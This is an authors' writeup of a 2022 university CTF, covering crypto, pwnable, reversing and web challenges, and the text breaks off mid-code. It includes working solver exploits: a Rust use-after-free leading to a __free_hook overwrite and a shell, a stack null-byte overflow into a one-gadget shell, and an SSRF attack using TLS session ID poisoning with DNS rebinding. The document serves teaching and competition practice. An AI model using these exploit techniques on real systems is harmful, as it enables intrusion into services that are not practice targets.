# 2022 Spring GoN Open Qual CTF Authors' Writeup
## Table of Contents
- [A. CS448](#A.-CS448)
- [B. Oxidized](#B.-Oxidized)
- [C. Run](#C.-Run)
- [D. Nonsense](#D.-Nonsense)
- [E. NullNull](#E.-NullNull)
- [F. Unconventional](#F.-Unconventional)
- [G. Trino: Albireo](#G.-Trino:-Albireo)
- [H. Trino: Pieces](#H.-Trino:-Pieces)
- [I. Trino: Rendezvous](#I.-Trino:-Rendezvous)
- [J. Trino: Mirai](#J.-Trino:-Mirai)
- [L. input box](#L.-input-box)
- [M. pyc](#M.-pyc)
- [O. Interchange](#O.-Interchange)
- [P. Showdown](#P.-Showdown)
- [Q. NSS](#Q.-NSS)
## A. CS448
Category: Crypto\
Author: [c0m0r1]\
Solvers: 45
<details>
<summary>Description</summary>
From cs448 course, [Professor Kim](https://caislab.kaist.ac.kr/kkj/) taught me that -
`The keystream generator determined entire security of the stream cipher`
...Then why doesn't anyone design ciphers using urandom?
How to decrypt? Who cares? At least it ensures confidentiality :)
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge about XOR encryption & Cryptographically safe/unsafe RNG
1. **Objective** - Understand frequency analysis to break skewed RNG-based stream cipher
The main vulnerability of implementation is in `encrypt` function (chal.py#L39)
```
enc = (get_random_u8() + key * i) % 0xff
```
By using `%` operator instead `&` operator, the output of urandom is skewed.
Since `get_random_u8` function get integer between [0, 255], the `i`th output is biased to `0` with probability 2/256.
Thus, the attacker can predict plantext's bytes by applying frequency analysis to each byte of ciphertext with a known key.
</details>
<details>
<summary>Solver Code</summary>
```python=1
import random
import time
from pwn import *
import copy
IP = "127.0.0.1"
PORT = 13102
ITER = 10000
context.log_level = "ERROR"
def get_enc_flag(p, key):
p.sendlineafter(">> ", "3")
p.sendlineafter(">> ", str(key))
res = p.recvline().split(":")[-1].strip().decode('hex')
return res
p = remote(IP, PORT)
st = time.time()
enc = get_enc_flag(p, 0xffff)
flag_len = len(enc)
print("[+] flag_len : %d"%flag_len)
flag = ""
freq_li = [[0 for _ in range(0x100)] for _ in range(flag_len)]
for j in range(ITER):
enc = get_enc_flag(p, flag_len + 1)
for i in range(len(enc)):
freq = freq_li[i]
freq[ord(enc[i])] += 1
for i, freq in enumerate(freq_li):
dec = freq.index(max(freq))
flag += chr(dec ^ ((flag_len + 1) * i) % 0xff)
print("[+] flag : %s"%flag)
print("[*] script end in %d sec"%(time.time() - st))
```
</details>
## B. Oxidized
Category: Pwnable\
Author: [c0m0r1]\
Solvers: 13
<details>
<summary>Description</summary>
We cannot swim against the tide.
Now itβs time to learn the hottest and oxidized system programming language.
![img](https://i.imgur.com/SkqbH5L.png)
Note : This challenge is designed for beginners.
You donβt have to worry like βIβve never encountered Rust!β or βI have no idea what Box, drop, or as_ref is!β.
As weβve always done, look at the source code, google what it is, and see how itβs represented as a binary.
You can definitely solve this challenge and make step up.
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic knowledge about tcache exploit on libc 2.27 & concept of Rust and it's internals.
1. **Objective** - Understand how Rust code is compiled to binary & how to exploit UAF from unsafe codes.
The main vulnerability of implementation is in `delete` method of `KVStore` (main.rs#L46)
```
fn delete(&mut self, key : u64) -> bool{
match self.search(key) {
None => false,
Some(n) => {
drop(unsafe { Box::from_raw(n as &mut Node as *mut Node) } );
true
},
}
}
```
UAF occurs since it destruct `Node` object without poping from vector.
We can figure out the size of some important objects by reversing or using debugger
- `Box<Node>` : 0x18
- `Box<String>` : 0x18
- `String` : various (size can be controlled by `with_capacity` method)
Attacker can exploit this UAF with given primitives with well-known glibc 2.27 tcache exploit.
</details>
<details>
<summary>Solver Code</summary>
```python=1
from pwn import *
LOCAL = False
DEBUG = True
BINPATH = "../deploy/chal"
IP = "127.0.0.1"
PORT = 13100
binary = ELF(BINPATH)
libc = ELF("./libc.so.6")
if LOCAL:
p = process(BINPATH)
else :
p = remote(IP, PORT)
if DEBUG:
context.log_level = "DEBUG"
def main(p):
p.recvuntil(">> ")
def insert(p, key, val, is_string = False, size = 0):
main(p)
p.sendline("1")
p.sendlineafter(">> ", str(key))
p.sendlineafter(">> ", "Y" if is_string else "N")
if is_string:
p.sendlineafter(">> ", str(size))
p.sendlineafter(">> ", val)
else:
p.sendlineafter(">> ", str(val))
p.recvline()
def delete(p, key):
main(p)
p.sendline("4")
p.sendlineafter(">> ", str(key))
def search(p, key):
main(p)
p.sendline("2")
p.sendlineafter(">> ", str(key))
return p.recvuntil("1.")[:-2]
def update(p, key, val, is_string = False, size = 0):
main(p)
p.sendline("3")
p.sendlineafter(">> ", str(key))
if is_string:
p.sendlineafter(">> ", str(size))
p.sendlineafter(">> ", val)
else:
p.sendlineafter(">> ", str(val))
p.recvline()
def view_all(p):
main(p)
p.sendline("5")
p.recvuntil("---------------------")
return p.recvuntil("1.")[:-2]
def exit(p):
main(p)
p.sendline("5")
# leak haep address
insert(p, 1, 1)
delete(p, 1)
if LOCAL:
heap_base = int(view_all(p).split("->")[0]) - 0x52f0
else:
heap_base = int(view_all(p).split("->")[0]) - 0x52f0
print(heap_base)
print("[+] heap base : 0x%x"%heap_base)
# get libc ptr on heap region
insert(p, 2, "a", True, 0x800)
delete(p, 2)
# create fake node with string to leak libc
payload = p64(0xdeadbe02)
if LOCAL:
payload += p64(heap_base + 0x53b0) # large chunk address
else:
payload += p64(heap_base + 0x53b0)
payload += p8(0) # is_string field
insert(p, 3, payload, True, 0x18)
# get libc address
if LOCAL :
libc_base = int(search(p, 0xdeadbe02)) - 0x3ebca0
else:
libc_base = int(search(p, 0xdeadbe02)) - 0x3ebca0
print("[+] libc base : 0x%x"%libc_base)
# create fake node with string to hook overwrite
insert(p, 4, 1)
delete(p, 4)
free_hook_addr = libc_base + libc.symbols["__free_hook"]
system_addr = libc_base + libc.symbols["system"]
payload = p64(0xdeadbe04)
payload += p64(free_hook_addr)
payload += p8(0) # is_string field
insert(p, 5, payload, True, 0x18)
update(p, 0xdeadbe04, system_addr)
# trigger free to get shell
insert(p, 6, "/bin/sh", True, 0x18)
delete(p, 6)
p.interactive()
```
</details>
## C. Run
Category: Reversing\
Author: [c0m0r1]\
Solvers: 20
<details>
<summary>Description</summary>
Time is running out.
There's nowhere to run.
You need to run this program.
So run.
RUN.
NOW
[BGM](https://youtu.be/mw2kKyJu9gY?t=126)
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic x86_64 reversing skills
1. **Objective** - Understand Run Length Encoding and Bit Scan Reverse instruction
Just simple Run Length Encoding in following format.
![pic1](https://i.imgur.com/22xyW0d.png)
![pic1](https://i.imgur.com/yZqOMf1.png)
Simple reversing & knowledge about bit operation will solve this chal with ease.
</details>
<details>
<summary>Solver Code</summary>
```python=1
#!/usr/bin/python3
import struct
def u64(x):
return struct.unpack("<Q", x)[0]
def read_bit(b, n):
return 1 if (b[n // 8] & (1 << (n % 8))) != 0 else 0
def write_bit(b, n, i):
b[n // 8] |= (b[n // 8] | ((1 if i != 0 else 0) << (n % 8)))
def decode(src, dst):
src_curr = 0
src_end = len(src) * 8
dst_curr = 0
run_length_log = 0
run_length = 0
while src_curr < src_end :
run_length_log = 0
while True:
if src_curr >= src_end:
return
bit = read_bit(src, src_curr)
src_curr += 1
run_length_log += 1
if not bit:
break
run_length = 0
for i in range(run_length_log - 1):
run_length |= (read_bit(src, src_curr) << i)
src_curr += 1
run_length |= (read_bit(src, src_curr) << (run_length_log - 1))
src_curr += 1
for _ in range(run_length):
write_bit(dst, dst_curr, 0)
dst_curr += 1
write_bit(dst, dst_curr, 1)
dst_curr += 1
if __name__ == "__main__":
with open("flag.enc", "rb") as f:
data = f.read()
file_size = u64(data[:8]) // 8
src = list(data[8:])
res = [0 for _ in range(file_size)]
decode(src, res)
with open("flag", "wb") as f:
f.write(bytes(res))
```
</details>
## D. Nonsense
Category: Reversing\
Author: [c0m0r1]\
Solvers: 17
<details>
<summary>Description</summary>
This binaryβs routine doesnβt make any sense
Letβs just beat up the author rather than reversing this
![img](https://i.imgur.com/v3956cZ.png)
</details>
<details>
<summary>Solution</summary>
1. **Prerequisite** - Basic x86_64 reversing skills
1. **Objective** - Understand signal hander logic and binary processing automation
Provided binary perform simple things
- Register sigsegv handler
- Get 0x40 bytes string from argv[1]
- For each 2 bytes of flag, binary dereference the hashed value of it.
- In SIGSEGV handler, check the fault address, skip the intended SIGSEGV and perform flag checking
This challenge can be solved in various ways
- Reverse the hash logic, identify what it is(Quark), and search the implementation to crack it
- Use python ctypes to automate the hash crack (author's way)
- Use gdbscript to automate the hash crack
</details>
<details>
<summary>Solver Code</summary>
```python=1
from ctypes import *
import struct
def p16(x):
return struct.pack("<H", x)
binary = cdll.LoadLibrary('./main')
binary_base = cast(binary._handle, POINTER(c_longlong)).contents.value
do_hash_type = CFUNCTYPE(c_longlong, c_ushort)
func = do_hash_type(binary_base + 0xAB7)
enc_dict = {}
for i in range(0x10000):
assert(enc_dict.get(i) == None)
enc_dict[func(i)] = i
enc_arr = []
for i in range(24):
enc_arr.append(cast(binary_base + 0x206020 + i * 8, POINTER(c_longlong)).contents.value)
flag = ""
for enc in enc_arr:
flag += p16(enc_dict[enc])
print("flag : %s"%flag)
```
</details>
## E. NullNull
Category: Pwnable\
Author: [Xion]\
Solvers: 25
<details>
<summary>Description</summary>
I know there's been some trust issues on "baby" CTF chals, but this really is a NullNull(colloquially "spacious", "easy" in KR) pwnable chal...
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Simple pwnable challenge exploiting a single null byte overflow on stack into rbp (Frame Pointer Overwrite) caused by `char buf[N]; scanf("%Ns", buf);`
Unlike some other functions such as `fgets`, scanf receives up to number of characters of specified width, and then appends a null byte at the end.
This causes a single null byte overflow into saved `rbp` inside the echoing function (menu choice 1). Immediately returning back to the main loop, we now have the overwritten `rbp`.
Inspection of how `rbp` is used in the main loop quickly shows that arguments are saved on the stack accessed relative to `rbp`, specifically `arrlen = rdi = [rbp - 0x18]` and `arrptr = rsi = [rbp - 0x20]`. Thus after `rbp` overwrite we can shift rbp downwards by 0x0 ~ 0xf0, possibly accessing a different array length and pointer values on stack.
Players can retry until `rbp&0xff` is a desired value. The author chose 0x10, as overwriting this to null shifts the stack frame such that `arrlen = addr of somewhere inside loop()` (last return value) and `arrptr = rbp` (last saved rbp == our forged rbp).
Overwriting the main loop return address to oneshot gadget and returning suffices to pop shell.
</details>
<details>
<summary>Solver Code</summary>
```python=1
#!/usr/bin/env python3
from pwn import *
context.aslr = True
context.arch = 'x86_64'
context.log_level = 'info'
warnings.filterwarnings(action='ignore')
binary = ELF('../public/nullnull')
libc = ELF('/lib/x86_64-linux-gnu/libc-2.31.so')
oneshots = [0xe3b31, 0xe3b34]
MASK = (1<<64) - 1
def echo(s):
p.sendline('1')
p.sendline(s)
p.readline()
def writeat(idx, val):
p.sendline('2')
p.sendline(str(idx))
p.sendline(str(val))
def readat(idx):
p.sendline('3')
p.sendline(str(idx))
return int(p.readline(False))
DEBUG = False
while True:
try:
libc.address = 0
if DEBUG:
p = process('../public/nullnull')
# gdb.attach(p, gdbscript="handle SIGALRM ignore\nhandle SIGHUP ignore\n")
else:
p = remote('host2.dreamhack.games', 21224)
# overwrite LOBYTE(rbp) = 0
echo('A'*80)
# If LOBYTE(rbp) was previously 0x10,
# mem = overwritten rbp
# len = addr of somewhere inside loop()
binary.address = readat(3) - 0x1249
assert binary.address & 0xfff == 0
log.success(f'binary: 0x{binary.address:012x}')
# stack addr leakable (but not needed)
rbp = readat(2) - 0x120
assert rbp & 0xff == 0
log.success(f'rbp: 0x{rbp:012x}')
# leak libc address
libc.address = readat(0x120 // 8 + 1) - libc.libc_start_main_return
assert libc.address & 0xfff == 0
log.success(f'libc : 0x{libc.address:012x}')
# set loop() return address to oneshot
writeat(3, libc.address + oneshots[0])
# return from loop(), triggering oneshot
p.sendline('4')
p.sendline('cat flag')
print(p.recvregex(r'GoN{.*}'))
break
except KeyboardInterrupt:
break
except (EOFError, AssertionError):
pass
finally:
try:
p.close()
except:
pass
```
</details>
## F. Unconventional
Category: Reversing\
Author: [Xion]\
Solvers: 10
<details>
<summary>Description</summary>
![img](https://i.imgur.com/Zy1yiAE.png)
</details>
<details>
<summary>Solution</summary>
**TL;DR**: Simple x86_64 reversing, but with functionalities of `rsp` and `rax` exchanged. Reverse the custom AES-like encryption to get flag.
Throwing the binary into a decompiler will immediately raise some kind of error related to stack frame being broken.
Inspection of the binary starting from `main()` shows that the calling convention is certainly not normal; function starts with a `xchg rsp, rax`. There are also no use of `push` or `pop`, and function calls are also assembled in a weird way.
These observations, with the hint of given description, shows that `rsp` and `rax` are simply "exchanged", i.e. `rax` is now the stack pointer and `rsp` is now a general register for function return values (and much more).
Players can disassemble the binary, swap back all uses of `rsp` and `rax`, assemble it back and throw it into a decompiler for a proper decompilation. Alternatively, the binary is small enough to analyze by hand after understanding how the two registers are used.
</details>
<details>
<summary>Solver Code</summary>
```c=1
#include <stdio.h>
#include <stdint.h>
#include <string.h>
#include <x86intrin.h>
typedef uint8_t Block[4][4];
Block key = {{0x21, 0xe5, 0x88, 0xac}, {0xbb, 0xb0, 0x97, 0xea}, {0x16, 0x42, 0x03, 0x0b}, {0x9b, 0xd2, 0x5c, 0x6c}};
const uint8_t sbox[0x100] = { // ARIA S-box #2
0xe2, 0x4e, 0x54, 0xfc, 0x94, 0xc2, 0x4a, 0xcc, 0x62, 0x0d, 0x6a, 0x46, 0x3c, 0x4d, 0x8b, 0xd1,
0x5e, 0xfa, 0x64, 0xcb, 0xb4, 0x97, 0xbe, 0x2b, 0xbc, 0x77, 0x2e, 0x03, 0xd3, 0x19, 0x59, 0xc1,
0x1d, 0x06, 0x41, 0x6b, 0x55, 0xf0, 0x99, 0x69, 0xea, 0x9c, 0x18, 0xae, 0x63, 0xdf, 0xe7, 0xbb,
0x00, 0x73, 0x66, 0xfb, 0x96, 0x4c, 0x85, 0xe4, 0x3a, 0x09, 0x45, 0xaa, 0x0f, 0xee, 0x10, 0xeb,
0x2d, 0x7f, 0xf4, 0x29, 0xac, 0xcf, 0xad, 0x91, 0x8d, 0x78, 0xc8, 0x95, 0xf9, 0x2f, 0xce, 0xcd,
0x08, 0x7a, 0x88, 0x38, 0x5c, 0x83, 0x2a, 0x28, 0x47, 0xdb, 0xb8, 0xc7, 0x93, 0xa4, 0x12, 0x53,
0xff, 0x87, 0x0e, 0x31, 0x36, 0x21, 0x58, 0x48, 0x01, 0x8e, 0x37, 0x74, 0x32, 0xca, 0xe9, 0xb1,
0xb7, 0xab, 0x0c, 0xd7, 0xc4, 0x56, 0x42, 0x26, 0x07, 0x98, 0x60, 0xd9, 0xb6, 0xb9, 0x11, 0x40,
0xec, 0x20, 0x8c, 0xbd, 0xa0, 0xc9, 0x84, 0x04, 0x49, 0x23, 0xf1, 0x4f, 0x50, 0x1f, 0x13, 0xdc,
0xd8, 0xc0, 0x9e, 0x57, 0xe3, 0xc3, 0x7b, 0x65, 0x3b, 0x02, 0x8f, 0x3e, 0xe8, 0x25, 0x92, 0xe5,
0x15, 0xdd, 0xfd, 0x17, 0xa9, 0xbf, 0xd4, 0x9a, 0x7e, 0xc5, 0x39, 0x67, 0xfe, 0x76, 0x9d, 0x43,
0xa7, 0xe1, 0xd0, 0xf5, 0x68, 0xf2, 0x1b, 0x34, 0x70, 0x05, 0xa3, 0x8a, 0xd5, 0x79, 0x86, 0xa8,
0x30, 0xc6, 0x51, 0x4b, 0x1e, 0xa6, 0x27, 0xf6, 0x35, 0xd2, 0x6e, 0x24, 0x16, 0x82, 0x5f, 0xda,
0xe6, 0x75, 0xa2, 0xef, 0x2c, 0xb2, 0x1c, 0x9f, 0x5d, 0x6f, 0x80, 0x0a, 0x72, 0x44, 0x9b, 0x6c,
0x90, 0x0b, 0x5b, 0x33, 0x7d, 0x5a, 0x52, 0xf3, 0x61, 0xa1, 0xf7, 0xb0, 0xd6, 0x3f, 0x7c, 0x6d,
0xed, 0x14, 0xe0, 0xa5, 0x3d, 0x22, 0xb3, 0xf8, 0x89, 0xde, 0x71, 0x1a, 0xaf, 0xba, 0xb5, 0x81
};
uint8_t sbox_inv[0x100];
const uint8_t chain[0x10] = {
0x3, 0xc, 0xb, 0x5,
0x8, 0x4, 0x7, 0xd,
0xf, 0x0, 0x6, 0xe,
0x9, 0x1, 0xa, 0x2
};
uint8_t chain_inv[0x10];
Block answer[3] = {
{
{0x89, 0xb4, 0xf7, 0x8f},
{0xe1, 0x8b, 0x29, 0x0d},
{0x37, 0xb1, 0x56, 0xc0},
{0xf0, 0x75, 0x42, 0x8e},
},
{
{0x1c, 0xc4, 0x2d, 0x1d},
{0xd9, 0x2e, 0xd4, 0x83},
{0x55, 0xee, 0x6b, 0xad},
{0x53, 0x40, 0x79, 0x65},
},
{
{0x07, 0x9a, 0x0a, 0xb2},
{0x9f, 0x82, 0x99, 0x10},
{0xdf, 0x45, 0x22, 0x6b},
{0x50, 0xdb, 0x0b, 0x40},
},
};
void SubBytes(Block block);
void RotateBlock(Block block);
void Twiddle(Block block);
void AddRoundKey(Block block, Block key);
void SubBytes_inv(Block block);
void RotateBlock_inv(Block block);
void Twiddle_inv(Block block);
void AddRoundKey_inv(Block block, Block key);
int main(void)
{
char buf[0x31] = {0,};
for (int i = 0; i < 0x100; i++)
sbox_inv[sbox[i]] = i;
for (int i = 0; i < 0x10; i++)
chain_inv[chain[i]] = i;
// shift key to last roundkey
Block dummy = {{0,},};
for (int j = 0; j < 0xc0ff33; j++) {
AddRoundKey(dummy, key);
}
for (int i = 0; i < 3; i++) {
Block round_key;
memcpy(round_key, key, sizeof(round_key));
for (int j = 0; j < 0xc0ff33; j++) {
AddRoundKey_inv(answer[i], round_key);
Twiddle_inv(answer[i]);
RotateBlock_inv(answer[i]);
SubBytes_inv(answer[i]);
}
}
memcpy(buf, answer, sizeof(answer));
printf("GoN{%s}\n", buf);
return 0;
}
void SubBytes(Block block)
{
// S-box substitution
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] = sbox[block[y][x]];
}
void SubBytes_inv(Block block)
{
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] = sbox_inv[block[y][x]];
}
void RotateBlock(Block block)
{
// rotate downwards by 0, 1, 2, 3
Block tmp;
for (int x = 0; x < 4; x++)
for (int y = 0; y < 4; y++)
tmp[y][x] = block[(y+4-x)%4][x];
memcpy(block, tmp, sizeof(tmp));
}
void RotateBlock_inv(Block block)
{
Block tmp;
for (int x = 0; x < 4; x++)
for (int y = 0; y < 4; y++)
tmp[y][x] = block[(y+x)%4][x];
memcpy(block, tmp, sizeof(tmp));
}
void Twiddle(Block block)
{
// Invert(Xor) -> Add -> Rotate
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] ^= (chain[idx] << 4) | chain[idx];
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[chain[idx]/4][chain[idx]%4] += block[idx/4][idx%4];
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] = __rolb(block[idx/4][idx%4], chain[idx] % 8);
}
void Twiddle_inv(Block block)
{
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] = __rorb(block[idx/4][idx%4], chain[idx] % 8);
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain_inv[idx])
block[idx/4][idx%4] -= block[chain_inv[idx]/4][chain_inv[idx]%4];
for (int i = 0, idx = 0; i < 0x10; i++, idx = chain[idx])
block[idx/4][idx%4] ^= (chain[idx] << 4) | chain[idx];
}
void AddRoundKey(Block block, Block key)
{
// XOR with current round key
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] ^= key[y][x];
// (Next key) = (Current key) |> SubBytes |> RotateBlock |> Twiddle
SubBytes(key);
RotateBlock(key);
Twiddle(key);
}
void AddRoundKey_inv(Block block, Block key)
{
Twiddle_inv(key);
RotateBlock_inv(key);
SubBytes_inv(key);
for (int y = 0; y < 4; y++)
for (int x = 0; x < 4; x++)
block[y][x] ^= key[y][x];
}
```
</details>
## G. Trino: Albireo
Category: Web\
Author: [Xion]\
Solvers: 3
<details>
<summary>Description</summary>
`Stage 1`
Look upon the brilliant stars of the night sky.\
Admire the pale gold and indigo blue of the double star `Albireo`.
> Note: All `Trino` chal server & public files are equivalent (excluding Specfile descriptions).
</details>
<details>
<summary>Solution</summary>
**TL;DR**: SSRF via [HTTPS Session ID Poisoning]
Players can send Curl requests to any desired URL. Curl instance is initialized as the following code in `requester.py`:
```python=30
def load_opts(c):
c.setopt(pycurl.PROTOCOLS, pycurl.PROTO_HTTP | pycurl.PROTO_HTTPS)
c.setopt(pycurl.FOLLOWLOCATION, 1)
c.setopt(pycurl.MAXREDIRS, 5)
c.setopt(pycurl.TIMEOUT, 5)
# Let the upper-level DNS resolver take care of caching,
# this Curl instance is ephemeral anyways.
c.setopt(pycurl.DNS_CACHE_TIMEOUT, 0)
# You can test your https server with self-signed certs, how neat!
c.setopt(pycurl.SSL_VERIFYPEER, 0)
c.setopt(pycurl.SSL_VERIFYHOST, 0)
return c
```
Players can only use HTTP/HTTPS requests, at most 5 redirections are allowed with a total timeout of 5s, and the DNS cache is disabled. Also, SSL cert validation is disabled (for convenience).
Now as Flask sessions are (un)serialized through pickle and the requirements of this challenge is to set a 'flag' field to value 'albireo' in session, we have a clear way to the solution: SSRF to either Redis or Memcached.
Either analysis or trial-and-error will reveal the following:
1. HTTP + Redis fails due to "Host:" header.
2. HTTPS + Redis fails due to null bytes inside command line. Specifically, Redis command parser will choke on the null byte and receive data without processing anything until client buffer limit is full.
3. HTTP + Memcached fails due to "HTTP/" at end of request line.
4. HTTPS + Memcached is the only feasible solution, but how do we control data to be sent through HTTPS?
Considering all possible data fields in a HTTPS request (specifically ClientHello), there is one field that looks promising: Session ID.
Enter the world of [HTTPS Session ID Poisoning]. This is a technique that works as following:
1. Send a domain that resolves to either attacker IP or internal IP (DNS rebinding attack)
2. Domain first resolves to attacker IP, which the attacker responds with an attacker-chosen Session ID (TLS-level) + redirect to same domain (HTTP-level).
3. Domain now resolves to internal IP. However the domain is same, Curl assumes that Session ID must be reused and sends the ClientHello to internal IP with **attacker-controlled Session ID**.
Now we have a SSRF primitive to send arbitrary 0x20 bytes. The author uses Memcached meta commands to send most data as possible in a single SSRF request.
> Note: This challenge is a simplified version of [hxp CTF 2020 security scanner], although the author recognized the challenge after discovering the Black Hat presentation... π
</details>
<details>
<summary>Solver Code</summary>
Solver code is ~~blatantly copied~~ mostly based on the custom TLS server from [hxp CTF 2020 security scanner] writeup. Players can alternatively grab any TLS server implementation and modify Session ID as necessary.
`albireo/TLS/__init__.py`:
```python=1
# Blatantly copied from https://github.com/dfyz/ctf-writeups/blob/master/hxp-2020/security%20scanner/fake_git.py
import argparse
import base64
import hashlib
import hmac
import re
import socket
import struct
import time
from Crypto.Cipher import AES
from Crypto.PublicKey import RSA
from dataclasses import dataclass
from pathlib import Path
import threading
# RFC 5246, section 5
def prf(secret, label, seed, length):
def hmac_sha256(key, msg):
return hmac.digest(key, msg, hashlib.sha256)
seed = label + seed
result = b''
cur_a = seed
while len(result) < length:
cur_a = hmac_sha256(secret, cur_a)
result += hmac_sha256(secret, cur_a + seed)
return result[:length]
def to_ad(seq_num, tls_type, tls_version, tls_len):
return struct.pack('>QBHH', seq_num, tls_type, tls_version, tls_len)
# Chosen by fair dice roll, guaranteed to be random.
def get_random_bytes(length):
return b'A' * length
class TLS:
# in bytes (i.e., this is 4096 bits)
KEY_LENGTH = 512
PKCS_PREFIX = b'\x00\x02'
# TLS 1.2
VERSION = 0x0303
# TLS_RSA_WITH_AES_128_GCM_SHA256, because we don't care to support the full DH exchange.
CIPHER_SUITE = 0x9c
CHANGE_CIPHER_SPEC_CONTENT_TYPE = 0x14
ALERT_CONTENT_TYPE = 0x15
HANDSHAKE_CONTENT_TYPE = 0x16
DATA_CONTENT_TYPE = 0x17
FINISHED_HANDSHAKE_TYPE = 0x14
@dataclass
class Record:
content_type: int
version: int
data: bytes
@dataclass
class HandshakeRecord:
handshake_type: int
data: bytes
@dataclass
class SessionKeys:
master_secret: bytes
client_key: bytes
server_key: bytes
client_salt: bytes
server_salt: bytes
def __init__(self, socket, priv_key, certs, session_id):
self.socket = socket
self.priv_key = priv_key
self.certs = certs
# Chosen by a fair dice roll.
self.server_random = get_random_bytes(32)
self.session_id = session_id
self.client_seq_num = 0
self.server_seq_num = 0
self.handshake_log = b''
self.session_keys = None
self._shake_hands()
def _read_record(self, expected_type):
header = self.socket.recv(5)
content_type, version, length = struct.unpack('>BHH', header)
data = self.socket.recv(length)
assert content_type == expected_type, f'Bad content type: got {content_type}, expected {expected_type}'
return TLS.Record(content_type, version, data)
def _write_record(self, record):
payload = struct.pack('>BHH', record.content_type, record.version, len(record.data)) + record.data
self.socket.send(payload)
def _read_handshake_record(self, expected_type, decrypt=False):
record = self._read_record(TLS.HANDSHAKE_CONTENT_TYPE)
payload = record.data
if decrypt:
payload = self._decrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE, record.version)
self.handshake_log += payload
header_size = 4
header, *_ = struct.unpack('>I', payload[:header_size])
handshake_type = header >> 24
assert handshake_type == expected_type, f'Bad handshake type: got {handshake_type}, expected {expected_type}'
length = header & 0xFF_FF_FF
return TLS.HandshakeRecord(handshake_type, payload[header_size:header_size + length])
def _write_handshake_record(self, record, encrypt=False):
header = (record.handshake_type << 24) | len(record.data)
payload = struct.pack('>I', header) + record.data
if encrypt:
payload = self._encrypt(payload, TLS.HANDSHAKE_CONTENT_TYPE)
self.handshake_log += payload
self._write_record(TLS.Record(TLS.HANDSHAKE_CONTENT_TYPE, TLS.VERSION, payload))
def _get_server_hello(self):
return b''.join([
struct.pack('>H', TLS.VERSION),
self.server_random,
struct.pack('B', len(self.session_id)),
self.session_id,
# No compression, no extension
struct.pack('>HBH', TLS.CIPHER_SUITE, 0, 0),
])
def _get_certificate(self):
def int16_to_int24_bytes(x):
return b'\x00' + struct.pack('>H', x)
packed_certs = b''.join([
int16_to_int24_bytes(len(cert)) + cert
for cert in self.certs
])
return int16_to_int24_bytes(len(packed_certs)) + packed_certs
def derive_keys(self, encrypted_premaster_secret, client_random):
assert len(encrypted_premaster_secret) == TLS.KEY_LENGTH
encrypted_premaster_secret = int.from_bytes(encrypted_premaster_secret, byteorder='big')
premaster_secret = pow(encrypted_premaster_secret, self.priv_key.d, self.priv_key.n).to_bytes(TLS.KEY_LENGTH, byteorder='big')
assert premaster_secret.startswith(TLS.PKCS_PREFIX)
premaster_secret = premaster_secret[premaster_secret.find(b'\x00', len(TLS.PKCS_PREFIX)) + 1:]
assert len(premaster_secret) == 48
master_secret = prf(premaster_secret, b'master secret', client_random + self.server_random, 48)
enc_key_length, fixed_iv_length = 16, 4
expanded_key_length = 2 * (enc_key_length + fixed_iv_length)
key_block = prf(master_secret, b'key expansion', self.server_random + client_random, expanded_key_length)
return TLS.SessionKeys(
master_secret=master_secret,
client_key=key_block[:enc_key_length],
server_key=key_block[enc_key_length:2 * enc_key_length],
client_salt=key_block[2 * enc_key_length:2 * enc_key_length + fixed_iv_length],
server_salt=key_block[2 * enc_key_length + fixed_iv_length:],
)
def _get_server_finished(self):
session_hash = hashlib.sha256(self.handshake_log).digest()
return prf(self.session_keys.master_secret, b'server finished', session_hash, 12)
def _encrypt(self, data, tls_type):
explicit_nonce = get_random_bytes(8)
cipher = AES.new(self.session_keys.server_key, AES.MODE_GCM, nonce=self.session_keys.server_salt + explicit_nonce)
cipher.update(to_ad(self.server_seq_num, tls_type, TLS.VERSION, len(data)))
ciphertext, tag = cipher.encrypt_and_digest(data)
self.server_seq_num += 1
return explicit_nonce + ciphertext + tag
def _decrypt(self, data, tls_type, tls_version):
cipher = AES.new(self.session_keys.client_key, AES.MODE_GCM, nonce=self.session_keys.client_salt + data[:8])
ciphertext = data[8:-16]
tag = data[-16:]
cipher.update(to_ad(self.client_seq_num, tls_type, tls_version, len(ciphertext)))
self.client_seq_num += 1
return cipher.decrypt_and_verify(ciphertext, tag)
def read(self):
record = self._read_record(TLS.DATA_CONTENT_TYPE)
payload = self._decrypt(record.data, TLS.DATA_CONTENT_TYPE, record.version)
#print(f'Got a message of length {len(payload)}')
return payload
def write(self, msg):
payload = self._encrypt(msg, TLS.DATA_CONTENT_TYPE)
self._write_record(TLS.Record(TLS.DATA_CONTENT_TYPE, TLS.VERSION, payload))
#print(f'Sent a message of length {len(payload)}')
def _shake_hands(self):
client_hello = self._read_handshake_record(0x1).data
client_random = client_hello[2:2 + 32]
#print(f'Got client hello')
self._write_handshake_record(TLS.HandshakeRecord(0x2, self._get_server_hello()))
#print(f'Sent server hello with session id {self.session_id}')
self._write_handshake_record(TLS.HandshakeRecord(0xb, self._get_certificate()))
#print(f'Sent {len(self.certs)} certificates')
self._write_handshake_record(TLS.HandshakeRecord(0xe, b''))
#print(f'Sent server hello done')
# Skip the redundant premaster secret length.
encrypted_premaster_secret = self._read_handshake_record(0x10).data[2:]
#print(f'Got a premaster secret')
self.session_keys = self.derive_keys(encrypted_premaster_secret, client_random)
self._read_record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE)
client_finished = self._read_handshake_record(TLS.FINISHED_HANDSHAKE_TYPE, decrypt=True)
#print(f'Got client finished')
self._write_record(TLS.Record(TLS.CHANGE_CIPHER_SPEC_CONTENT_TYPE, TLS.VERSION, b'\x01'))
server_finished = TLS.HandshakeRecord(TLS.FINISHED_HANDSHAKE_TYPE, self._get_server_finished())
self._write_handshake_record(server_finished, encrypt=True)
#print(f'Sent server finished, the connection is ready')
def get_http_response(code, headers, content):
headers.update({
